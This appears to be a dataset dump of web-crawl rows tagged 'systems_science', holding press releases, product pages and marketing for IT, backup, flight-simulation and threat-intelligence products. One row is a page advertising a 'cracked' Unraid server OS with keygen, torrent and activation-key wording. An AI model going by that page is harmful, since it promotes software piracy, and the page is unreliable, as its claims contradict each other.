url
stringlengths
15
1.48k
date
timestamp[s]
file_path
stringlengths
125
155
language_score
float64
0.65
1
token_count
int64
75
32.8k
dump
stringclasses
96 values
global_id
stringlengths
41
46
lang
stringclasses
1 value
text
stringlengths
295
153k
domain
stringclasses
67 values
https://mltox.fiit.stuba.sk/sk/
2023-06-06T06:28:27
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224652235.2/warc/CC-MAIN-20230606045924-20230606075924-00443.warc.gz
0.898771
111
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__174111641
en
A free online tool for in-silico phototoxicity prediction About the project The aim of the project was to design and create a system for predicting the phototoxicity of substances in order to control the measured experimental data but also for the needs of predicting the phototoxicity itself in order to reduce the financial costs of 'wet' experiments. We analyzed the measured data on cell cultures, 3D models (tissues) and animals. Using molecular descriptors and machine learning algorithms, we can predict the phototoxicity of selected substances.
systems_science
https://reimaginedmobility.org/reimagined-mobility-coalition-announces-christine-weydig-as-executive-director/
2023-06-04T16:51:06
s3://commoncrawl/crawl-data/CC-MAIN-2023-23/segments/1685224650201.19/warc/CC-MAIN-20230604161111-20230604191111-00018.warc.gz
0.928959
990
CC-MAIN-2023-23
webtext-fineweb__CC-MAIN-2023-23__0__230947865
en
WASHINGTON, D.C. (September 20, 2022)—The Coalition for Reimagined Mobility, a global initiative of the organization SAFE to advance public policy and implement real-world solutions that transform transportation systems to improve the movement of people and goods, announced today that it has selected Christine Weydig as its next Executive Director. “I am excited for the opportunity to lead this incredible initiative. The transportation systems we seek to change have not evolved in decades and now we have a convergence of technologies and business models that can harbinger in a new era that puts people first and the task at hand requires a coalition such as ours,” said Christine Weydig. “Our commissioners are already defining the future of mobility across the passenger and freight sectors; I am excited to bring my nearly two decades of government service and implementation experience to the table, and we will begin our work together with a focus on leveraging digitalization and technology to modernize our transportation systems around the world.” Prior to joining the Coalition, Weydig was the Director of Sustainability at the Port Authority of New York and New Jersey, where she led efforts to achieve industry-leading net-zero climate commitments – developing policy and programs to improve resilience and reduce the carbon footprint of the Agency’s four airports, five seaports, bridges, tunnels, rail systems, buildings, and transportation hubs. Weydig’s career has centered on building public-private partnerships to address the needs of complex energy and transportation systems, placing human wellness and accessibility at the forefront of sustainable transportation and infrastructure development. She has overseen and restructured public-sector energy portfolios to support economic development and worked around the globe for organizations including the U.S. Department of Energy, the U.S. Department of State, the United Nations Development Programme, and the Earth Institute at Columbia University. Weydig will bring these strong relationships and deep experience to the Coalition. “Christine is extremely qualified to take on this important responsibility and engage a diverse set of stakeholders,” said Mary Nichols, Former Chair, California Resources Board and current commissioner co-chair for the Coalition. “She is an accomplished leader and has done extensive work to bring complex policy concepts to reality for the transportation and energy sectors. Her deep relationships and know-how are an excellent fit to drive the mission of the Coalition forward.” Weydig will lead the Coalition’s commissioners, a group of industry CEOs, public sector leaders and practitioners across transportation, technology, and sustainability, in setting strategy and building alignment for its mission-driven work to formulate policies and advocate for solutions that reduces oil dependence and carbon emissions, improves air quality, enhances infrastructure resiliency and security, and creates economic opportunity and access to transportation systems using new technology and business models. “Christine’s decades of wide-ranging experience working in the Port Authority of New York and New Jersey will build on the Coalition’s groundbreaking analysis and drive forward its aim of a more reliable, resilient, and sustainable transportation sector, said Robbie Diamond, Founder, President and CEO of SAFE, a nonpartisan, nonprofit organization that enhances energy security and supports economic resurgence and resiliency by advancing transformative transportation and mobility technologies. “This work requires engagement with local, national, and global entities: Christine has the experience and the political acumen to drive big, bold changes across global transportation systems.” The Coalition for Reimagined Mobility (ReMo) is an initiative of SAFE. For more information about the Coalition, please visit our website: https://reimaginedmobility.org/about/. If you’re interested in getting involved in our mission, you can get in touch at [email protected] or sign up here to receive updates from the Coalition. About the Coalition for Reimagined Mobility As a global initiative of SAFE, the Coalition for Reimagined Mobility (ReMo) brings together industry CEO’s, public sector champions and academic leaders from across the transportation, technology, and sustainability sectors. The Coalition advances public policy and real-world solutions to transform transportation systems and achieve the efficient, flexible, resilient, accessible, and sustainable infrastructure and services that are the backbone of a flourishing global economy. For more information visit, reimaginedmobility.org. SAFE is a bipartisan nonprofit that accelerates the real-world deployment of secure, resilient, and sustainable transportation and energy solutions of the United States, and its partners and allies, by shaping policies, perceptions, and practices that create opportunity for all. Visit secureenergy.org. Vice President Communications, ReMo M: +1 202.341.9508
systems_science
https://ngotenders.net/un-report-highlights-growing-threat-of-cyber-warfare/
2024-02-29T20:32:31
s3://commoncrawl/crawl-data/CC-MAIN-2024-10/segments/1707947474853.43/warc/CC-MAIN-20240229202522-20240229232522-00892.warc.gz
0.949753
476
CC-MAIN-2024-10
webtext-fineweb__CC-MAIN-2024-10__0__65899545
en
The United Nations recently released a report that highlights the growing threat of cyber warfare on a global scale. The report, titled “The Cyber Threat Landscape: A Call for Action,” outlines the increasing frequency and sophistication of cyber attacks, as well as the potential consequences for international security and stability. According to the report, cyber attacks have become a primary tool for state and non-state actors to advance their political, military, and economic objectives. These attacks can range from simple data breaches and ransomware attacks to more complex and destructive operations that can disrupt critical infrastructure, such as power grids, transportation systems, and financial institutions. One of the key findings of the report is that the use of cyber warfare is no longer limited to a few technologically advanced nations. Instead, a wide range of actors, including terrorist groups, criminal organizations, and ideological movements, are increasingly using cyber capabilities to achieve their goals and undermine the security of other nations. The report also emphasizes the growing interconnectedness of the global economy and the increasing reliance on digital technologies, which makes countries more vulnerable to cyber threats. As a result, the potential impact of cyber attacks has expanded beyond traditional military targets to include a wide range of civilian infrastructure and systems. The report calls for urgent action to address the growing threat of cyber warfare. It emphasizes the need for greater international cooperation and coordination to develop norms and rules of behavior in cyberspace, as well as to increase the capacity of countries to prevent, mitigate, and respond to cyber attacks. In response to the report, the United Nations Secretary-General has called on member states to prioritize cybersecurity and invest in the development of robust cyber defenses. This includes investing in cybersecurity training and education, building resilient and secure digital infrastructure, and enhancing international cooperation to address cyber threats. The report also underscores the need for greater transparency and accountability regarding cyber operations, as well as the development of mechanisms to attribute cyber attacks to specific actors and hold them accountable for their actions. Overall, the UN report highlights the urgent need for action to address the growing threat of cyber warfare. As technologies continue to advance and societies become more connected, it is essential for nations to work together to prevent and mitigate the potentially devastating impact of cyber attacks on global security and stability. Only through collective efforts can we effectively address the complex and evolving challenges posed by the cyber threat landscape.
systems_science
https://bypassapp.com/unraid-cracked-download-server-full-license-key/
2024-04-24T13:12:54
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296819273.90/warc/CC-MAIN-20240424112049-20240424142049-00414.warc.gz
0.889047
1,653
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__122152565
en
Unraid Server Full Version Activation Key Unraid 6.11.5 Cracked is a proprietary operating system for personal and small business use that provides a combination of features and tools found in traditional standalone servers, as well as features commonly found in NAS systems. It is designed to manage storage and applications in a flexible and scalable manner. The OS allows for multiple operating systems to run on the same system, each with direct access to the physical disk drives and with the ability to be added or removed without affecting other systems. Unraid was developed to address the limitations and complexities faced by users who wanted to run multiple operating systems on a single machine. The idea behind Unraid 2023 Keygen is to provide a simple and efficient way for users to manage and organize their data, applications, and virtual machines, while also allowing for a high level of customization and control. By offering a flexible and scalable solution, Unraid allows users to build their ideal computing environment to fit their specific needs and requirements. Who Can Avail This OS? Unraid 6.11.5 License Key full is primarily aimed at home users, small businesses, and enthusiast users who want to build a high-performance and versatile computing environment. It is ideal for those who want to run multiple operating systems, such as Windows, Linux, and macOS, on the same machine, as well as those who want to store, manage, and protect their data using a single system. Unraid Activator can also be used for running virtual machines, media streaming, and gaming, among other uses. In short, anyone who wants a flexible and scalable solution for managing their data, applications, and virtual machines can use Unraid. Things to Know Before Using Unraid OS Full Version: Before using Unraid 6.11.5 Patch, it is recommended that you have some basic knowledge of computing, storage, and networking concepts, as well as experience with operating systems and virtualization. Additionally, it is important to understand the following: - Unraid uses a custom filesystem, which is different from traditional filesystems used by most operating systems. - Unraid Torrent version operates in a plug-and-play fashion, meaning that drives can be added or removed without affecting the system or data. - Unraid uses a hybrid of traditional parity protection and software-defined storage to provide data protection and fault tolerance. - It supports a wide range of hardware, including different CPU architectures, motherboards, and storage devices. - Unraid allows you to run multiple operating systems on the same machine, each with direct access to the physical drives. - Unraid Server Cracked has a vibrant community that offers support, resources, and plugins to enhance the functionality of the OS. By understanding these concepts, you will be better equipped to use Unraid effectively and get the most out of its features and capabilities. You Can Also Take a Look At: Restoro Full Version License Key Product Key Features: Some of the main features of Unraid Kuyhaa OS include: - Flexible storage management: Unraid allows you to organize and manage your data, applications, and virtual machines in a flexible and scalable manner. - Multiple operating system support: Unraid Server Torrent supports the simultaneous running of multiple operating systems, each with direct access to the physical drives. - Parity and data protection: Unraid 94fbr uses a hybrid of traditional parity protection and software-defined storage to provide data protection and fault tolerance. - Virtualization: Unraid Registration Key list supports the creation and management of virtual machines, making it easy to run multiple operating systems on the same machine. - Plug-and-play drive support: It operates in a plug-and-play fashion, allowing you to add or remove drives without affecting the system or data. - Wide hardware compatibility: Unraid 6.11.5 supports a wide range of hardware, including different CPU architectures, motherboards, and storage devices. - Community plugins and add-ons: Unraid Torrent has a vibrant community that offers support, resources, and plugins to enhance the functionality of the OS. - Easy to use and intuitive user interface: This app features a user-friendly and intuitive web interface, making it easy to manage your storage, applications, and virtual machines. These features make Unraid Activation Code a versatile and powerful solution for managing data, applications, and virtual machines, and make it suitable for a wide range of use cases, including home media streaming, gaming, and small business computing. The system requirements for Unraid OS are as follows: - CPU: A 64-bit x86 processor with at least two cores is required. - Memory: A minimum of 4 GB of RAM is recommended, although more is recommended for running multiple virtual machines or demanding applications. - Storage: A USB flash drive with a minimum capacity of 8 GB is required for installing Unraid 6.11.1. You will also need one or more disk drives for storing your data and applications. - Network: A gigabit Ethernet adapter is recommended, although fast Ethernet is supported. - Motherboard: Cracked Unraid 6.11.5 OS supports a wide range of motherboards, but it is recommended to check the compatibility list before purchasing. It is important to note that these are minimum requirements, and performance will vary based on the specific hardware configuration and usage scenario. For more demanding applications, such as running multiple virtual machines, it is recommended to use higher-end hardware with more RAM, CPU cores, and faster disk drives. How to Install Unraid OS? Installing Unraid OS 6.11.3 is a straightforward process that can be completed in a few steps. Here is a general overview of the installation process: - Download the Unraid OS installation image from the official website. - Burn the image to a USB flash drive using a tool like Rufus or Etcher. - Connect the USB flash drive to the target system and boot from it. - Follow the on-screen prompts to select the language and keyboard layout. - Choose the “Install” option and select the disk drives that you want to use for Unraid 6.11.3. - Configure the network settings and set a password for the web interface. - Wait for the installation to complete, which may take several minutes depending on the size of your disk drives. - After the installation is complete, remove the USB flash drive and reboot the system. - Log in to the web interface using a web browser and complete the initial setup process. It is recommended to consult the official Unraid 6.11.5 documentation for a more detailed explanation of the installation process, as well as any specific instructions or considerations that may apply to your particular hardware configuration. Unraid Full Version Registration Process: To register Unraid OS, you need to purchase a license from the official website. The license is tied to a specific machine and is used to unlock additional features and capabilities, such as support for more than one parity-protected disk, virtualization, and access to the community plugins and add-ons. Here is a general overview of the registration process: - Purchase a license from the official Unraid website. - Log in to the web interface using a web browser. - Go to the “Settings” section and click on the “Licenses” tab. - Enter the Unraid license key that you received when you purchased the license. - Click the “Activate” button to apply the license to your Unraid system. - Wait for the activation to complete, which may take a few minutes. - After the activation is complete, the additional features and capabilities that are tied to your license will become available. It is important to note that the license is tied to a specific machine and cannot be transferred to another system. If you need to transfer your license to a different machine, you will need to purchase a new license for that machine.
systems_science
http://www.x-aviation.com/catalog/product_info.php/take-command-hot-start-tbm-900-p-158?osCsid=114e784321bfd6f96ef6d0b09381f2d8
2020-04-03T22:53:19
s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370518767.60/warc/CC-MAIN-20200403220847-20200404010847-00025.warc.gz
0.921642
2,056
CC-MAIN-2020-16
webtext-fineweb__CC-MAIN-2020-16__0__106922600
en
Take Command!: Hot Start TBM 900[TBM9001.1.12] X-Aviation is proud to announce our fourth offering that lets you Take Command! The X-Aviation Take Command! brand of products represents the very best of flight simulation immersion, and assures you this Hot Start product is one of the most sophisticated, study sim level aircraft available for X-Plane! Real world pilots test and assist in the development of these products, and real world procedures are followed. It tells you these products are unlike any other product you've seen outside of the ever growing X-Aviation catalog! Want to feel like a real captain? Take Command! Quick start interactive tutorial in sim, custom failure engine, fully simulated icing and rain effects (both on windows and airframe), custom 3D sound engine with real sounds recorded from a TBM 900, G1000 simulation with Synthetic Vision, maintenance simulation to see how much wear and tear the aircraft accumulates, extremely detailed interior and exterior (down to even each LED light modeled in the strobes). This aircraft is simply in a class of its own for features and immersion! Mac, Windows & Linux. X-Plane 11 only. Hot Start is a team comprised of two very talented, well known developers in the X-Plane world. While the name may be new, their previous projects (BetterPushback and the Take Command!: Saab 340A) are far from new and have been met with tons of awards and accolades over the years. Combining forces has allowed these two developers to create the ultimate TBM 900 simulation like none other seen for any flight simulator to date. The main objective for Hot Start was to create a product that not only simulated beautiful artwork and intense systems simulations, but also to be a learning platform for its pilots. You will become intimate with the knowledge of the PT-6 engine, the costs of maintenance for over-time wear & tear, and how flying specific ways may harm or help the aircrafts longevity. First Time Loading The first time you install and load the aircraft you'll immediately understand why this simulation is so different and special. You'll be greeted with a voice and visual overview live in the cockpit of how to start the engine. It's very in-depth, and allows you to get a good feel for what's going on almost immediately; and it's fun! Systems & Avionics The avionics include a custom simulated G1000 complete with Synthetic Vision. It's not just "there", it actually requires you to properly use the avionics at your disposal or risk harming the aircraft! Everything specific to a TBM 900 is there, and from a systems perspective the small but important nuances are there to a degree never seen before! From the ground up, the avionics simulation has been focused on heavy use of modern multi-threaded CPUs and fluidity. Each custom subsystem, such as the weather radar, TAWS and engine indication systems, to name but a few, is coded to run in its own set of threads and interact with the rest of the avionics in an asynchronous manner. This has allowed us to assemble the aircraft without the usual balancing act of trading graphical fidelity for simulator frame rate. The attention paid to the physical simulation of systems is second to none. For example, the aforementioned weather radar isn't just a pretty display that scans across a pre-existing weather map. It really does simulate radio beam propagation, energy absorption, scattering and reflectivity. What comes out on the display represents the output of a complex ballet of physical calculations. When you turn up the radar gain, the radar really does alter the way it samples its input beam returns. Huge efforts have been put into the flight and engine model of this aircraft, which was one of the first things that we started working on over a year ago. The results are both impressive and amazing, and this was thanks to one of our beta team members who owns a TBM 900 and our developer was able to get real flight time in the aircraft. Beyond this, we also made the aircraft available to other owners and pilots of the aircraft to get their feedback and get the hand flying experience just right. A Personality of Its Own From the start, we have been focusing on making the aircraft "feel" like a real machine. And if you have dealt with real aircraft, you will know that they can be moody at times. Sometimes the engine starts on the first try, sometimes it just seems to want to drag its feet. Other times, you come up to the aircraft and the battery is strangely low, so you need to sit on the ramp after engine start a bit longer to let it charge up. While working on the core systems model in the TBM900, we have taken a great deal of time to focus on getting this kind "personality" coded into the aircraft. • Heavily multi-threaded systems architecture to leverage performance of modern CPUs with many cores. • Flight model tuned to perform to within a few percent of the real aircraft in the normal flight envelope, including maximum and stall speeds, rate of climb, fuel burn, trim behavior and control feel. • Full aircraft state persistence. Every switch, flight control position, fuel state and on-airport position is restored upon reload. Even between reloads, system resources change in real time. The engine and oil cools down slowly between flights, the battery drains, tires slowly deflate, etc. • Fine-grained systems model, down to individual sub-components. The always-on failure system realistically responds to wear & tear and overstress for each sub-component based on individual load factors. Over-torque, over-temp, frequent starts, hard landings, operating in FOD-contaminated environments and many more all affect individual sub-component wear & tear and service life. • Sub-component wear realistically reflects on aircraft performance. Worn engine parts reduce maximum available power, worn prop reduces top speed, worn tires result in worse grip during ground ops, etc. • Aircraft maintenance manager to inspect and repair or replace any damaged sub-component. The maintenance manager tracks per-airframe operating expenses in a realistic manner to show the real cost of operating the aircraft. • Airframe manager that allows you to operate multiple simulated airframes, each with their own independently tracked wear & tear, livery selections and custom registration marks applied. • Airframes can be automatically synchronized between multiple machines over the network with just a few clicks. This automatically syncs up aircraft position, configuration and wear & tear to simulate multiple users sharing the same physical aircraft. See how your fellow pilots treated the aircraft by checking the maintenance manager and engine trend monitoring outputs. • X-Plane 11 G1000 avionics stack with lots of customizations and overlays to simulate the special extensions in the real TBM900. This includes a custom EICAS, systems synoptic pages and special integration with the extra simulated systems such as the weather radar, TAS, electrics, etc. • Integrated Synthetic Vision into the PFD with obstacle display, navigation pathways, airport labels and TAWS-B integration. • Integrated live charts display from FAA and Autorouter.aero. Navigraph integration will be available in a future update. • Fully custom electrical system. Simulation of all buses, switching behaviors and reconfigurations. Full circuit breaker system, integrated with the X-Plane failure system, so a failed or failing system can pop a breaker. • Highly accurate PT6 engine model with realistic startup and operating behavior. Engine lag, secondary fuel flow, ITT evolution, response to auxiliary load and many more fine-grained behaviors. • Custom prop governor, with all modes simulated, including electric auto-feather with negative torque sensing. • Crew Alerting System integrated into the avionics stack with all annunciations, takeoff/landing inhibits, flight state filters and "corner cases" simulated. • Environmental Control System integrated into the custom EICAS. Air conditioning and pressurization respond in real time to environmental factors such as ambient temperature, pressure, available engine bleed air, cabin temperature setting, cabin pressure vessel failures, etc. • Custom TAWS-B ground proximity warning system with all annunciations modes, inhibits, real-time impact point prediction and terrain painting up on the MFD to ranges of 200NM. The TAWS-B uses the X-Plane terrain DSF data to construct its database, so it is always "up to date". • GWX 70 weather radar with weather & ground modes and realistic radar return painting. Full simulation of radar beam energy dissipation, signal attenuation when passing through dense weather and vertical cell analysis modes. Terrain mapping accurately paints surface features, including recognizable peaks, valleys and lakes. Supports the X-Plane 11 default atmospheric model as well as xEnviro. • GTS 820 Traffic Advisory System (TAS) with aural alerts + visual alerts, the TAS MFD page and compatibility with X-Plane default traffic, PilotEdge, Vatsim and IVAO. • Full simulation of the ESI-2000 standby instrument, including all configuration pages, sensor failures, AHRS drift and "roll-over" during extreme maneuvers, realistic battery operation and real-time battery depletion, etc. • Dynamic custom registration mark painting on the fuselage and instrument panel with support for custom TrueType fonts, colors and positioning. This lets livery painters make a "generic" livery and each pilot apply their own custom registration mark with just the click of a button directly in the simulator. Liveries can specify a custom position and font to optimize the look. • Custom sound engine with samples from the real aircraft and accurate modeling of individual engine states and sub-component noises such as fuel pumps, gear pumps, flap actuators, etc. • Includes quick start and user interface guides.
systems_science
https://prerelease.barnesandnoble.com/w/soft-systems-methodology-brian-wilson/1102332456?ean=9780471894896
2020-03-31T11:19:21
s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370500426.22/warc/CC-MAIN-20200331084941-20200331114941-00253.warc.gz
0.896165
416
CC-MAIN-2020-16
webtext-fineweb__CC-MAIN-2020-16__0__102354683
en
Soft Systems Methodology: Conceptual Model Building and Its Contribution / Edition 1 available in Hardcover Conceptual model building is accepted as a key phase in Soft Systems Methodology. Despite the recognition of the importance of the SSM, students are still experiencing difficulty with the basic process of conceptual model building. This book addresses that issue. |Product dimensions:||6.89(w) x 9.88(h) x 0.79(d)| About the Author BRIAN WILSON has a background in nuclear power engineering and control system design. In 1966 he became a founding member of the Department of Systems Engineering at the University of Lancaster, where he pursued the application of control principles to management problem solving. There he was involved in the development and use of Human Activity Systems and 'verbs in the imperative' in place of mathematics as the modelling language for the intellectual processes involved and maintained particular interest in the application of SSM to information and organisation-based analysis. This research was published in Systems: Concepts, methodologies and Applications by John Wiley Sons. In 1992 he founded his own consulting company, Brian Wilson Associates, where he continues to develop and apply his unique brand of Soft Systems Methodology. Table of Contents Foreword by Mike Duffy. Preface. Preamble. Models and Methodology. Basic Principles of HAS Modelling. Selection of Relevant Systems. Business Process Re-engineering. The Consensus Primary Task Model. CPTMFormulation Using Wider-system Extraction. CPTMAssembly Using the Enterprise Model. Application to Training Strategy and HR. Generic Model Building. Conclusions. Appendix 1: The Albion Case. Appendix 2: Exercises. Appendix 3: The Development of the United Kingdom's Single Army Activity Model and Associated Information Needs and its Relationship to Command and Control. Appendix 4: An Overview of Soft Systems Methodology. Appendix 5: Example of Applying Information Analysis Method to Airspace Control Function. Appendix 6: Examples of Product to Information Category Mapping. References. Index.
systems_science
http://datto.com/products/siris-2/
2015-06-02T13:22:17
s3://commoncrawl/crawl-data/CC-MAIN-2015-22/segments/1433195035761.14/warc/CC-MAIN-20150601214355-00036-ip-10-180-206-219.ec2.internal.warc.gz
0.899499
1,218
CC-MAIN-2015-22
webtext-fineweb__CC-MAIN-2015-22__0__201820279
en
Datto SIRIS 2 is a complete family of enterprise business continuity solutions, available in both physical and virtual platforms, built from the ground up, for businesses of every size. When downtime isn’t an option, SIRIS 2 is the preferred choice. To get the benefits of SIRIS using hardware you already have, try GENISIS. Dramatically reduce downtime with backups saved both locally and in the cloud. Redundancy in data protection better protects users from the unexpected. Advanced bandwidth management software, local restoration and full cloud data copies are among the many advantages of this solution. This proprietary technology eliminates broken backup chains. Each time a backup occurs data is converted directly into a virtual machine, with the most recent backup image always being the base image. Data is always available immediately, both on and off-site. This groundbreaking proprietary technology allows you to identify file or application changes between any two backup points. You can easily find that deleted folder or determine which files a virus affected. No more guessing if your backup is working properly. Datto boots backups as virtual machines, capturing an image of the login page to give you visual proof that your data has been successfully backed up. An industry first. All SIRIS 2 devices come equipped with hot-swappable drive bays. This enables MSPs to perform on-site field upgrades, within each product line. It’s never been easier to scale solutions and grow with your customers. Learn more about the SIRIS 2 product line. “The features and benefits of Datto’s SIRIS solution are far superior than the other off-site storage solutions we have evaluated in the past, but that’s not what makes Datto a pleasure to work with. From implementation to ease of use, their product aligns with our core services, but their client service is the key reason why working with Datto is such a delight.Strategic Initiatives Consultant, River Run Computers “Datto SIRIS backup … the best thing since sliced bread.Founder and President, DLC Technology “Since [Datto] SIRIS ‘tests itself’, it’s been smooth sailing. I am confident in the event of a disaster that my data will be recovered quickly.President and Managing Partner, Greenwire Solutions Datto virtual appliances now supports VMware, Hyper-V and XenServer. Our Intelligent Business Continuity solution can now be purchased as a virtual appliance on virtual infrastructure in addition to our physical hardware. Using image-based backup allows Datto to take an image (ie: picture) of an entire system, not simply individual files or applications. This contributes to a superior Recovery Time Objective (RTO) and the ability to boot virtual machines. Image-based backup is an integral component of Intelligent Business Continuity. Datto devices now come standard with Solid State OS Drives for improved speed and reliability, Hot-Swappable Drive Bays for easy scalability, and RAID for added redundancy. Backups can be virtualized locally to the Datto device or to the secure Datto cloud, instantly, with the click of a button. This unique feature is a key component to intelligent business continuity. Should a local disaster occur, business can continue as usual in the Datto cloud. All data is protected by AES 256 encryption both in transit and in the cloud. Additionally, users have the option to encrypt data locally, and pass phrases can be specified per appliance or per protected machine to meet compliance regulations. Power is nothing without control, and Datto offers a meticulously refined toolkit for device and account management. A single pane of glass is used to configure devices, schedule backup reports, monitor off-site amounts, set up alerts and more. All data sent off-site is compressed using LZMA2 compression to ensure maximum efficiency and provide a stellar user experience even in low bandwidth and high network traffic environments. eDiscovery gives Datto users the ability to perform granular recoveries from Microsoft Exchange Server and Microsoft Office SharePoint Server. Powered by Ontrack® PowerControls™ from industry leader Kroll Ontrack, eDiscovery makes it easy to search documents, emails and attachments by keyword and restore exactly what you need. Datto utilizes the image-based ShadowSnap™ agent, developed in conjunction with StorageCraft. ShadowSnap is based on the premise of dual backup engines: application-aware VSS by default, with the engine as a safety net. ShadowSnap is particularly useful in performing bare metal restores as it supports dissimilar hardware. AgentSync is Datto’s proprietary technology for quickly and efficiently transferring files to and from the cloud. It allows users to prioritize server backup order, pipeline recovery points, and set up multiple agents to sync off-site simultaneously. This provides greater data integrity, reduces network traffic, and keeps off-site backups up to date. Datto supports Microsoft Windows operating systems for almost any Windows PC or server that is still production today. Support currently ranges from Windows 2000 to Windows 8 and Server 2012. Granular recovery is also available for Exchange and Sharepoint servers. Restore full machines quickly and efficiently through our USB Bare Metal Restore process. Go from physical machines to virtual (P2V) or vice versa with our unique dissimilar hardware tool that allows for maximum flexibility when restoring. No drives or cables needed as the system can run completely over the user’s network. Datto uses the latest networking technology to increase speed and performance. 500GB-60TB Storage Capacity (Per Unit) Hot-Swappable Drive Bays for Easy Field Upgrades Solid-State OS Drives on All Models Available 2 x 2.4 GHz Xeon Six Core Processor IPMI Standard on Rackmount Units RAID 1 - RAID 10 Storage Configurations Unlimited Server, Workstation and Desktop Licensing 3 Year Hardware Warranty
systems_science
https://www.spectrotel.com/resource-center/press-releases/detail/2023/09/21/spectrotel-hires-jon-moss-to-lead-digital-transformation-of-customer-experience
2024-04-19T19:21:36
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817442.65/warc/CC-MAIN-20240419172411-20240419202411-00780.warc.gz
0.916736
618
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__115653530
en
Spectrotel Hires Jon Moss to Lead Digital Transformation of Customer Experience Grain Management supports multi-million-dollar investment in Spectrotel Managed Network Services NEPTUNE, NJ (September 21, 2023) – Spectrotel, Inc., a next-generation aggregator and leading integrated communication services provider, today announced the appointment of Jon Moss as Vice President of Digital Transformation concurrent with a multi-million-dollar investment to take Spectrotel Managed Network Services to the next level. The new technology initiative is supported by Grain Management (“Grain”), who approved the project following the acquisition of Spectrotel earlier this year. Jon is a technology leader with a deep background in cloud scale software engineering, big data analytics, network observability, AIOps and automation. He joins Spectrotel from Zayo and prior to that QOS Networks, who was acquired by Zayo, where he built, and scaled the technology approach to their industry-leading service management platform. Jon is enthusiastic about creating a rich digital customer experience backed by highly scalable enterprise software stacks. He intends to turbocharge Spectrotel’s Managed Network Services by expanding the network management platform, develop a proactive, predictive, and prescriptive observability posture using AIOps and enhanced analytics, and continually investing in network automation. “There couldn’t be a more exciting time to invest in bringing software to the network,” said Moss. “With advances in AI, machine learning, and continued adoption of advanced networking products, we can accelerate our customers’ digital transformation with a best-in-market platform. I am proud to join an incredibly talented team at such a pivotal time for the organization, and I can’t wait to see what we can do.” “Spectrotel has built a solid foundation in Managed Network Services that complements our market leadership position in network service aggregation,” said Ross Artale, Spectrotel CEO. “With Grain’s support, we are now ready to take this part of our business to the next level and redefine the total customer experience by providing services that help them truly transform their operation, enhance performance, and introduce a new level of innovation to their businesses. We are delighted to have Jon join our leadership team with a focus on leading our technology transformation that will facilitate this effort.” As the Next Generation Aggregator, Spectrotel is uniquely positioned to address the IT challenges of today and tomorrow. Leveraging their expansive relationships with best-in-class technology providers, with their thorough approach to understanding customer-specific organizational requirements, Spectrotel delivers comprehensive solutions to minimize risk, optimize resources and technology, and modernize the enterprise. Vice President, Marketing & Product
systems_science
https://www.chameleon-system.de/en/chameleon-features/auftragsabwicklung-logistik/interface-tradebyte_aid_489.html
2023-04-02T05:30:11
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296950383.8/warc/CC-MAIN-20230402043600-20230402073600-00740.warc.gz
0.907475
475
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__194059687
en
The combination of Chameleon Saas Shop and Tradebyte represents the optimum solution for online retailers who want to sell their goods simultaneously through multiple channels and want to run their own online shop at minimal expense. By using the unique possibilities of Tradebyte you benefit from a powerful product and process management system to centrally administer an extensive range of goods. The Chameleon interface ensures that the articles captured in Tradebyte are transferred smoothly to your Chameleon online shop. Together with Chameleon SaaS offered by the ESONO AG you can set up your own brand store in a short time and with a minimum of initial costs. What makes it even more special is the fact that not only article data, but all transactions are transmitted bidirectionally, which means that all sales and payment processes of your online shop are reported to Tradebyte. In addition, the shop system is in turn notified about shipping or cancellations and sends an automated e-mail to the customer. Combined with one of Chameleon's integrated payment interfaces, which supports refunds such as Payone, this will provide you with a complete package for processing your online business. Key features of the Chameleon-Tradebyte interface Tradebyte specialises in software solutions for vendors and marketplaces, which now want to profit from the “market without limits”. As pioneers of “Networked E-Commerce” the company has concentrated on standardised, cloud-based technologies and comprehensive service since the beginning. At the centre of the application are the software modules especially developed for the management of e-commerce article data (PIM = Product Information Management) and order data (OMS = Order Management System). With TB.One you can comfortably and centrally monitor as many platforms or marketplaces as you like, from Amazon to Zalando. TB.Market is the first standardised software solution, which enables the simple connection of drop shopping suppliers and therefore provides access to the successful platform or market place business. Tradebyte Software GmbH Phone: +49 981 20822-0
systems_science
https://www.pericertum.com/solutions/predict-and-prevent/
2022-08-11T13:56:00
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571472.69/warc/CC-MAIN-20220811133823-20220811163823-00291.warc.gz
0.920003
495
CC-MAIN-2022-33
webtext-fineweb__CC-MAIN-2022-33__0__181711790
en
Prevent Cyber Attacks using Artificial Intelligence Making Darkweb and Deepweb Threat Intelligence Actionable There are thousands of new vulnerabilities disclosed to the public annually – but, knowing the urgency of which ones to patch is a significant challenge for security teams around the globe. Given limited resources, you need to identify and address the most critical ones first. Why? Not all vulnerabilities present the same level of risk. Some are minor, while others can have an extremely high probability of becoming exploited. Identifying the software to patch most urgently can be critical to an organization’s survival. So how can one identify the most dangerous vulnerabilities? Research has shown that hackers use less than 3% of all publicly known vulnerabilities in attacks — yet 99% of breaches are due to known vulnerabilities. Some vulnerabilities are more useful to hackers than others. Those discussed in the dark web, where hackers are planning, buying and selling exploits, have a greater than 31% probability of being weaponized toward an exploit. Our tools leverage automated machine learning to datamine hacking communities within the deep and dark web. The resulting information may be used by our clients to assist in prioritizing remediation efforts to focus on those vulnerabilities which are most relevant to their networks. Focusing on those vulnerabilities currently being used by hackers can proactively improve cybersecurity posture and make it harder for hackers to penetrate. Our technology combines advanced machine learning with automatically mined deep web and dark web information to provide proactive, actionable cyber threat intelligence. This approach is unique in the cybersecurity landscape, rapidly accelerating the collection of data to analyze using machine learning to identify potential threats. Our solutions are designed to empower network defenders with actionable intelligence before cyberattacks occur. Automated capture and analysis of deep and dark web data predict real threats and vulnerabilities with sufficient warning to allow cybersecurity professionals to take advanced corrective action. Our advantage is in our ability to combine dark web data with advanced machine learning. Automation speeds the data collection process and advanced machine learning provides accurate threat assessments. We can determine the most likely threats against your organization now— by scanning the dark web for current or emerging actionable threats and understanding what threat actors are discussing about your company brands, domains, customers, employees, and related information. As a result, your organization will be 